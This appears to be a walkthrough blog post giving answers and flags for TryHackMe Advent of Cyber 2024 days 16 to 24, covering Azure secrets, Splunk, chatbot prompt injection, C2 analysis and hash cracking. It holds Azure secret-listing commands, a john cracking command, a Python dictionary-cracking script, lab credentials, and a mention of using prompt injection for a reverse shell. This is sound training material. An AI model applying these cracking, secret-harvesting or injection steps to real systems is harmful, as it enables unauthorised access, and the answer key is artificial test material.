Day 16 Storyline
It was late. Too late. McSkidy’s eyelids felt as though they had dumbbells attached to them. The sun had long since waved goodbye to Wareville, and the crisp night air was creeping in through the window of McSkidy’s office. If only there were a substance which would both warm and wake her up. Once McSkidy’s brain cells had started functioning again, she remembered that coffee existed. Checking her watch, she was saddened to learn it was too late to get her coffee from her favourite Wareville coffee house, Splunkin Donuts; the vending machine downstairs would have to do. Sipping her coffee, McSkidy immediately lit up and charged back into the office, ready to crack the case; however, as she entered, the Glitch had an idea of his own. He’d got it: he had figured out an attack vector the user had likely taken! McSkidy took a seat next to the Glitch, and he began to walk her through it.
Learning Objectives
- Learn about Azure, what it is and why it is used.
- Learn about Azure services like Azure Key Vault and Microsoft Entra ID.
- Learn how to interact with an Azure tenant using Azure Cloud Shell.
TryHackMe Advent of Cyber Day 16 Answers
What is the password for backupware that was leaked?
#command
az ad user list --filter "startsWith('wvusr-', displayName)"
R3c0v3r_s3cr3ts!
What is the group ID of the Secret Recovery Group?
#command
az ad group list
7d96660a-02e1-4112-9515-1762d0cb66b7
What is the name of the vault secret?
#command
az keyvault secret list --vault-name warevillesecrets
aoc2024
What are the contents of the secret stored in the vault?
#command
az keyvault secret show --vault-name warevillesecrets --name aoc2024
WhereIsMyMind1999
TryHackMe Advent of Cyber Day 17: He analyzed and analyzed till his analyzer was sore!
Day 17 Storyline
Marta May Ware is going crazy: someone has disconnected the main server from the Wareville network, and nobody knows who it is! As soon as she realized it, she contacted Wareville’s top physical security company, WareSec&Aware, to let her view the data centre’s CCTV streams. They forbade it entirely: for privacy reasons, only the camera owner can view the recordings. Not even the WareSec&Aware employees themselves are allowed to do so.
Still, they said there was no recording of anybody entering the data centre yesterday! How could that be, wondered Marta May, desperate for answers. The company’s first supposition was that the owner of the cameras must have deleted the recordings from their management web page. But the data centre’s camera owner surely can’t be the perpetrator: it is none other than Byte, Glitch’s dog! Glitch insisted that Marta leave the ownership of the cameras to Byte precisely to avoid these kinds of happenings: Byte, the ultimate good boy, combines loyalty and sharp instincts to keep any place safe.
Marta May calls Glitch and McSkidy right away, explaining the situation in between the sobs. Glitch’s eyes darken: Someone is trying to frame Byte, and he will not let anybody vex his beautiful dog!
McSkidy is perplexed: why are the people at WareSec&Aware “supposing” that Byte had deleted the recordings? Shouldn’t they have some logs to prove such an accusation?
Marta May has the answer: they do have some log files that they back up every 6 hours, give or take.
But they can’t search through them. Or rather, they tried, but when they search for a keyword like the data centre’s camera IDs or the action “delete”, this is what they get:
user@tryhackme$ cat cctv_logs.log| grep -i "11"
2024-12-16 22:53:06 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:22 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:25 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
user@tryhackme$
user@tryhackme$ cat cctv_logs.log| grep -i "download"
2024-12-16 22:52:50 DownloadRecording 5 byte 51 10 opfg6ns9khsbpq0u4us6dro2m8
Unreadable!
McSkidy shakes her head: they must immediately send the log file to the SOC team! Armed with a SIEM, no log is unsearchable!
Learning Objectives
In this task, we will explore the following learning objectives while investigating the logs related to the incident scenario explained above:
- Learn how to extract custom fields in Splunk
- Learn to create a parser for the custom logs
- Filter and narrow down the search results using Search Processing Language (SPL)
- How to investigate in Splunk
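The second objective is to build a parser for this custom log format. As an added example, not the room’s Splunk configuration, the Python parser below pulls fields out of the log excerpt shown above (the sample lines are copied from it), attaches the `RecordingInfo:` continuation lines to the event they follow, and filters on fields instead of substrings. That is what makes the earlier `grep "11"` noise go away: a numeric id in one column no longer matches a digit buried inside a session id. The column names (`user_id`, `user_name`, `numbers`, `session_id`) are my assumption about what the fields mean; the room derives its own names in Splunk.

```python
"""Parser for the custom CCTV log format from the Day 17 excerpt.

Added example; field names are assumptions, sample lines are copied from
the log excerpt in the walkthrough.
"""
import re
from collections import Counter

SAMPLE_LOG = """\
2024-12-16 22:53:06 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:22 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
RecordingInfo: 1 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:53:25 WatchCamera 5 byte 11 rij5uu4gt204q0d3eb7jj86okt
2024-12-16 22:52:50 DownloadRecording 5 byte 51 10 opfg6ns9khsbpq0u4us6dro2m8
"""

# One event per line: timestamp, event name, a numeric id, a user name,
# one or more numeric ids, and a long alphanumeric session id at the end.
# The column meanings are assumed for this example.
EVENT_RE = re.compile(
    r"^(?P<timestamp>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<event>[A-Za-z]+) "
    r"(?P<user_id>\d+) "
    r"(?P<user_name>\S+) "
    r"(?P<numbers>(?:\d+ )+)"
    r"(?P<session_id>[a-z0-9]{20,})$"
)
# Continuation line that belongs to the event immediately before it.
INFO_RE = re.compile(
    r"^RecordingInfo: (?P<values>(?:\d+ )+)(?P<session_id>[a-z0-9]{20,})$"
)


def parse_cctv_log(text):
    """Return a list of event dicts.  RecordingInfo lines are attached to the
    preceding event rather than dropped; any other line is an error, so a
    format change shows up immediately instead of silently losing data."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = EVENT_RE.match(line)
        if m:
            event = m.groupdict()
            event["numbers"] = [int(n) for n in event["numbers"].split()]
            event["recording_info"] = []
            events.append(event)
            continue
        m = INFO_RE.match(line)
        if m and events:
            events[-1]["recording_info"].append(
                {"values": [int(n) for n in m["values"].split()],
                 "session_id": m["session_id"]}
            )
            continue
        raise ValueError(f"unparsed line: {line!r}")
    return events


def search(events, **criteria):
    """Field-based filter, the equivalent of an SPL `field=value` clause."""
    return [e for e in events if all(e.get(k) == v for k, v in criteria.items())]


def count_by(events, field):
    """Equivalent of `| stats count by <field>`."""
    return Counter(e[field] for e in events)


if __name__ == "__main__":
    evs = parse_cctv_log(SAMPLE_LOG)
    for e in search(evs, event="DownloadRecording"):
        print(e["timestamp"], e["user_name"], e["session_id"])
    print(count_by(evs, "event"))
```

With the events structured this way, the investigation questions below become field queries (`search(evs, event="DeleteRecording")`, `search(evs, session_id="...")`) rather than substring matches, which is the same step the room takes by defining extractions in Splunk.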
TryHackMe Advent of Cyber Day 17 Answers
Extract all the events from the cctv_feed logs. How many logs were captured associated with the successful login?
# run this in splunk
index=cctv_feed *successful*
642
What is the Session_id associated with the attacker who deleted the recording?
# run this in splunk
index=cctv_feed *delete*
rij5uu4gt204q0d3eb7jj86okt
What is the name of the attacker found in the logs, who deleted the CCTV footage?
# run this in splunk
index=cctv_feed *lsr1743nkskt3r722momvhjcs3*
mmalware
TryHackMe Advent of Cyber Day 18: I could use a little AI interaction!
Day 18 Storyline
Hyped with their latest release, a “health checker” service that tracks the health and uptime of the Wareville systems, the Wareville developers envisage the day in which the inhabitants of Wareville have a one-stop shop for seeking the answers to life’s mysteries and aiding them in their day-to-day jobs.
As a first stage, the Wareville developers create an alpha version of WareWise, Wareville’s intelligent assistant. Aware of the potential dangers of letting users interact with an intelligent AI, the developers decided to roll out the chatbot and its features slowly.
The IT department is the first to get hands-on with WareWise. For the IT department, WareWise has been integrated with the “health checker” service, making it much easier for the IT department to query the status of their servers and workstations.
Learning Objectives
In today’s task, you will:
- Gain a fundamental understanding of how AI chatbots work
- Learn some vulnerabilities faced by AI chatbots
- Practice a prompt injection attack on WareWise, Wareville’s AI-powered assistant
TryHackMe Advent of Cyber Day 18 Answers
What is the technical term for a set of rules and instructions given to a chatbot?
system prompt
What query should we use if we wanted to get the “status” of the health service from the in-house API?
Use the health service with the query: status
After achieving a reverse shell, look around for a flag.txt. What is the value?
THM{WareW1se_Br3ach3d}
TryHackMe Advent of Cyber Day 19: I merely noticed that you’re improperly stored, my dear secret!
Day 19 Storyline
Glitch was keen on uncovering Mayor Malware’s deeds. Today, he was sure he would find something neat. He knew the Mayor had an office downtown, where he kept his dirty laundry, the big old clown. He approached the site silently, not knowing the door was closed, so untimely. At the front of the door, a smart lock awaited; Glitch smiled because he knew it could be subverted. But oh, big surprise, the lock was eerie; a game controlled it; Glitch almost went teary.
If you are wondering how this came to be, Mayor Malware himself will explain it quickly. “Technology gets broken every day” was his claim, “but nobody knows how to hack a game.”
Will Glitch be able to pass through this door, or will he end up with zero as his score?
Learning Objectives
- Understand how to interact with an executable’s API.
- Intercept and modify internal APIs using Frida.
- Hack a game with the help of Frida.
TryHackMe Advent of Cyber Day 19 Answers
Q1) What is the OTP flag?
Answers :- THM{one_tough_password}
Q2) What is the billionaire item flag?
Answers :- THM{credit_card_undeclined}
Q3) What is the biometric flag?
Answers :- THM{dont_smash_your_keyboard}
Q4) If you liked today’s task, you can practice your skills with “Memories of Christmas Past” from Advent of Cyber 2023.
Answers :- No answer needed
TryHackMe Advent of Cyber Day 20: If you utter so much as one packet…
Day 20 Storyline:
McSkidy sat at her desk, staring at the PCAP file Glitch had just sent over. It was from Marta May Ware’s computer, the latest victim of Mayor Malware’s long-running schemes.
She smiled, glancing at Byte. “Looks like we’d have to use Wireshark again, eh boy?”
Glitch’s voice crackled over the comms. “Need any help analyzing it?”
McSkidy smiled. “Thanks, Glitch, but I’ve got this.”
Learning Objectives
- Investigate network traffic using Wireshark
- Identify indicators of compromise (IOCs) in captured network traffic
- Understand how C2 servers operate and communicate with compromised systems
TryHackMe Advent of Cyber Day 20 Answers
Q1) What was the first message the payload sent to Mayor Malware’s C2?
Answers :- I am in Mayor!
Q2) What was the IP address of the C2 server?
Answers :- 10.10.123.224
Q3) What was the command sent by the C2 server to the target machine?
Answers :- whoami
Q4) What was the filename of the critical file exfiltrated by the C2 server?
Answers :- credentials.txt
Q5) What secret message was sent back to the C2 in an encrypted format through beacons?
Answers :- THM_Secret_101
TryHackMe Advent of Cyber Day 21: HELP ME…I’m REVERSE ENGINEERING!
Day 21 Storyline
McSkidy’s alert dashboard lit up with an unusual alert. A file-sharing web application built by Glitch had triggered a security warning. Glitch had been working hard during this season’s SOC-mas after the last scare with the Yule Log Exploit, but this new alert caused McSkidy to question his intentions.
McSkidy began to investigate. It seemed the source of the alert came from a binary file that made its way to the web app’s backend. It did not belong there and had some anomalous activity. The binary was compiled with .NET. This whole setup seemed quite unusual, and with Glitch working on the latest security updates, McSkidy was filled with suspicion.
As McSkidy continued her investigation, Glitch rushed into the room: “I swear I did not put it there! I was testing defences, but I wouldn’t go that far!”
McSkidy reassured him, “This doesn’t look like your work. Let’s get to the bottom of this. Put on your decompiling hat, and let’s see what we are dealing with.”
Learning Objectives
- Understanding the structure of a binary file
- The difference between disassembly and decompilation
- Familiarity with multi-stage binaries
- Practically reversing a multi-stage binary
TryHackMe Advent of Cyber Day 21 Answers
1) What is the function name that downloads and executes files in the WarevilleApp.exe?
Ans: DownloadAndExecuteFile
2) Once you execute the WarevilleApp.exe, it downloads another binary to the Downloads folder. What is the name of the binary?
Ans: explorer.exe
3) What domain name is the one from where the file is downloaded after running WarevilleApp.exe?
Ans: mayorc2.thm
4) The stage 2 binary is executed automatically and creates a zip file comprising the victim’s computer data; what is the name of the zip file?
Ans: CollectedFiles.zip
5) What is the name of the C2 server where the stage 2 binary tries to upload files?
Ans: anonymousc2.thm
TryHackMe Advent of Cyber Day 22: It’s because I’m kubed, isn’t it?
Learning Objectives
- Learn how DFIR can be done in a Kubernetes environment using log analysis.
- Learn about Kubernetes, what it is and why it is used.
- Learn about DFIR, and the challenges that come with DFIR in an ephemeral environment.
TryHackMe Advent of Cyber Day 22 Answers
Q1) What is the name of the webshell that was used by Mayor Malware?
Answers:- shelly.php
Q2) What file did Mayor Malware read from the pod?
Answers:- db.php
Q3) What tool did Mayor Malware search for that could be used to create a remote connection from the pod?
Answers:- nc
Q4) What IP connected to the docker registry that was unexpected?
Answers:- 10.10.130.253
Q5) At what time is the first connection made from this IP to the docker registry?
Answers:- 29/Oct/2024:10:06:33 +0000
Q6) At what time is the updated malicious image pushed to the registry?
Answers:- 29/Oct/2024:12:34:28 +0000
Q7) What is the value stored in the “pull-creds” secret?
Answers:- {"auths":{"http://docker-registry.nicetown.loc:5000":{"username":"mr.nice","password":"Mr.N4ughty","auth":"bXIubmljZTpNci5ONHVnaHR5"}}}
TryHackMe Advent of Cyber Day 23: You wanna know what happens to your hashes?
Day 23 Storyline
Glitch has been investigating how Mayor Malware funds his shady operations for quite some time. Recently, the Mayor disposed of various old electronic equipment; one was an old tablet with a cracked screen. Being an avid connoisseur of active and passive reconnaissance who does not mind “dumpster diving” for the greater good, Glitch quickly picked it up before the garbage truck. Surprisingly, despite being in a terrible condition with a cracked and hazy screen, the tablet still turns on. Browsing through the various files, one PDF file that caught his attention was password-protected. It is time you work with Glitch to discover the password and uncover any evidence lurking there.
Learning Objectives
By finishing today’s task, you will learn about:
- Hash functions and hash values
- Saving hashed passwords
- Cracking hashes
- Finding the password of a password-protected document
TryHackMe Advent of Cyber Day 23 Answers
Crack the hash value stored in hash1.txt. What was the password?
Run the command
john --format=raw-sha256 --rules=wordlist --wordlist=/usr/share/wordlists/rockyou.txt hash1.txt
Ans: fluffycat12
What is the flag at the top of the private.pdf file?
Ans: THM{do_not_GET_CAUGHT}
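To make the john command above concrete, here is an added example (my own code, not the room’s and not john’s) of what `--format=raw-sha256 --rules=wordlist --wordlist=...` does under the hood: every wordlist entry is hashed, with and without a few mangling rules, and compared to the target digest. It also shows the defender’s side of the lesson, which is why the attack works at all: an unsalted, fast hash costs one SHA-256 per guess, whereas a salted PBKDF2 derivation forces per-hash work and stops a precomputed or shared list from cracking many accounts at once. The wordlist and the mangling rules are constructed; they stand in for rockyou.txt and john’s real rule set.

```python
"""Dictionary attack on a raw SHA-256 digest, and the storage scheme that
resists it.  Added example; the wordlist and rules are constructed.
"""
import hashlib
import hmac
import os

# Constructed stand-in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "christmas", "fluffycat", "fluffycat12", "mayor2024"]


def sha256_hex(password):
    """Unsalted SHA-256 of a password, as stored in hash1.txt."""
    return hashlib.sha256(password.encode()).hexdigest()


def mangle(word):
    """A few rules of the kind a wordlist rule set applies: the word itself,
    capitalised, and each with a digit, year or symbol appended."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "123", "2024", "!"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack_raw_sha256(target_hex, wordlist, use_rules=True):
    """Return the plaintext for an unsalted SHA-256 digest, or None.

    Each candidate costs exactly one hash, and the same work cracks every
    user who chose the same password: that is why raw SHA-256 is unfit
    for password storage."""
    target = target_hex.lower()
    for word in wordlist:
        candidates = mangle(word) if use_rules else (word,)
        for candidate in candidates:
            if hmac.compare_digest(sha256_hex(candidate), target):
                return candidate
    return None


def store_password(password, iterations=600_000):
    """What a defender stores instead: a random 16-byte salt plus a slow
    PBKDF2-HMAC-SHA256 derivation.  600,000 iterations follows current
    OWASP guidance for PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the derivation with the stored salt and compare in constant time."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    target = sha256_hex("fluffycat12")  # the kind of value hash1.txt holds
    print("cracked:", crack_raw_sha256(target, WORDLIST))
    record = store_password("fluffycat12")
    print("stored form:", record[:40], "...")
    print("verify:", verify_password("fluffycat12", record))
```

A wordlist attack against the PBKDF2 record would need the full 600,000-iteration derivation for every candidate and for every account separately because of the salt, which is the practical difference between the two storage schemes.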
TryHackMe Advent of Cyber Day 24: You can’t hurt SOC-mas, Mayor Malware!
Day 24 Storyline
The city of Wareville has invested in smart lights and heating, ventilation, and air conditioning (HVAC). Oh, it was so easy to control the lights and heating remotely. Following the recent incidents, McSkidy started monitoring these smart devices’ communication protocols. Not long after the lights and heating were up and running, Mayor Malware figured out how these devices were controlled and sabotaged them. Luckily, McSkidy was one step ahead and picked up the malicious commands that had been sent. Can you help McSkidy figure out which commands were sent? We can then use our findings to update the devices’ configuration and save the day!
Learning Objectives
In this task, you will learn about:
- The basics of the MQTT protocol
- How to use Wireshark to analyze MQTT traffic
- Reverse engineering a simple network protocol
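The first and third objectives, the basics of MQTT and reverse engineering a simple protocol from a capture, come down to knowing the packet layout well enough to pull the topic and payload out of the bytes Wireshark shows. As an added example, not the room’s code, here is a minimal MQTT 3.1.1 PUBLISH encoder and decoder: the fixed header with its type and flag bits, the variable-length “remaining length” field, the length-prefixed topic, the optional packet identifier for QoS 1 and 2, and the payload. The topic names and payloads are constructed placeholders, not values from the room’s capture.

```python
"""Minimal MQTT 3.1.1 PUBLISH encoder/decoder.

Added example; topics and payloads are constructed.  Only enough of the
specification is implemented to read a captured PUBLISH packet.
"""
import struct

PACKET_TYPES = {
    1: "CONNECT", 2: "CONNACK", 3: "PUBLISH", 4: "PUBACK",
    8: "SUBSCRIBE", 9: "SUBACK", 12: "PINGREQ", 13: "PINGRESP", 14: "DISCONNECT",
}


def encode_remaining_length(n):
    """Variable-length integer: 7 bits per byte, high bit set means 'more'."""
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n:
            byte |= 0x80
        out.append(byte)
        if not n:
            return bytes(out)


def decode_remaining_length(data, offset):
    """Return (value, offset_after_field); at most four bytes are allowed."""
    value, multiplier = 0, 1
    for i in range(4):
        byte = data[offset + i]
        value += (byte & 0x7F) * multiplier
        if not byte & 0x80:
            return value, offset + i + 1
        multiplier *= 128
    raise ValueError("malformed remaining length")


def build_publish(topic, payload, qos=0, retain=False, packet_id=1):
    """Encode a PUBLISH packet (type 3 in the high nibble, flags in the low)."""
    flags = (qos << 1) | (1 if retain else 0)
    topic_bytes = topic.encode("utf-8")
    body = struct.pack("!H", len(topic_bytes)) + topic_bytes
    if qos > 0:
        body += struct.pack("!H", packet_id)  # packet id only for QoS 1 and 2
    body += payload
    return bytes([0x30 | flags]) + encode_remaining_length(len(body)) + body


def parse_packet(data):
    """Decode one MQTT control packet.  PUBLISH is fully decoded into
    topic, qos, retain, packet_id and payload; other types are named only."""
    ptype = data[0] >> 4
    flags = data[0] & 0x0F
    remaining, offset = decode_remaining_length(data, 1)
    if len(data) < offset + remaining:
        raise ValueError("truncated packet")
    body = data[offset:offset + remaining]
    result = {"type": PACKET_TYPES.get(ptype, f"UNKNOWN({ptype})"), "flags": flags}
    if ptype != 3:
        return result
    qos = (flags >> 1) & 0x03
    if qos == 3:
        raise ValueError("invalid QoS 3")  # reserved by the specification
    (topic_len,) = struct.unpack("!H", body[:2])
    pos = 2 + topic_len
    result["topic"] = body[2:pos].decode("utf-8")
    result["qos"] = qos
    result["retain"] = bool(flags & 0x01)
    if qos > 0:
        (result["packet_id"],) = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
    result["payload"] = body[pos:]
    return result


if __name__ == "__main__":
    # Constructed bytes of the kind a capture would show: topic
    # "wareville/lights", payload "on".  0x30 = PUBLISH, QoS 0; 0x14 = 20
    # remaining bytes = 2 (topic length) + 16 (topic) + 2 (payload).
    captured = b"\x30\x14\x00\x10wareville/lightson"
    print(parse_packet(captured))
    print(build_publish("wareville/lights", b"on") == captured)
```

When a broker accepts unauthenticated publishes, anyone who can reach it can build exactly these bytes, so the two defensive levers are broker-side authentication and ACLs on the command topics; the decoder is what lets you confirm from a capture which topics and payloads actually reached the devices.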
TryHackMe Advent of Cyber Day 24 Answers
What is the flag?
Ans: THM{Ligh75on-day54ved}